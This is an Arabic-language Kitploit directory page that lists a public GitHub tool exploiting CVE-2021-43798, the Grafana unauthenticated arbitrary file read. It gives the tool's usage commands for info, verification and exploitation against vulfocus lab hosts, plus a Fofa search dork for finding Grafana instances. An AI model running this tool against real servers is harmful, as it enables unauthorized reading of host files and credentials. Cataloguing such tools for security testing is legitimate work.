Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-43798 — ثغرة قراءة الملفات التعسفية في Grafana | Kitploit
أدوات/GitHubGitHub/zer0yu/cve-2021-43798
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubzer0yu/cve-2021-43798

CVE-2021-43798

ثغرة قراءة الملفات التعسفية في Grafana

عرض المستودع
276منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

GrafanaArbitraryFileRead

الاستخدام

1. عرض المعلومات

root@kitploit:~
❯ go run main.go -s                                               
[INF] VulnInfo:
{
  "Name": "Grafana Arbitrary File Read",
  "VulID": "nil",
  "Version": "1.0",
  "Author": "z3",
  "VulDate": "2021-12-07",
  "References": [
    "https://nosec.org/home/detail/4914.html"
  ],
  "AppName": "Grafana",
  "AppPowerLink": "https://grafana.com/",
  "AppVersion": "Grafana Version 8.*",
  "VulType": "Arbitrary File Read",
  "Description": "An unauthorized arbitrary file reading vulnerability exists in Grafana, which can be exploited by an attacker to read arbitrary files on the host computer without authentication.",
  "Category": "REMOTE",
  "Dork": {
    "Fofa": "app=\"Grafana\"",
    "Quake": "",
    "Zoomeye": "",
    "Shodan": ""
  }
}%     

2. التحقق

root@kitploit:~
echo vulfocus.fofa.so:55628 | go run main.go -v -t 20
http://vulfocus.fofa.so:55628

3. الاستغلال

root@kitploit:~
echo http://vulfocus.fofa.so:51766 | go run main.go -m exploit -v

تحقيق لفكرة الاستغلال في المرجع الأول. لاستخراج مزيد من المعلومات، يرجى تعديل التعبير النمطي في دالة getAccesskey.

المراجع

  1. تحليل أحدث ثغرة قراءة الملفات العشوائية في Grafana وشرح المشكلات المشتقة
  2. ثغرة قراءة الملفات العشوائية غير المصرح بها في Grafana

إخلاء المسؤولية

هذا الإجراء مخصص للفحص الذاتي الأمني فقط، يرجى الالتزام الواعي بالقوانين المحلية.

تنزيل الأداة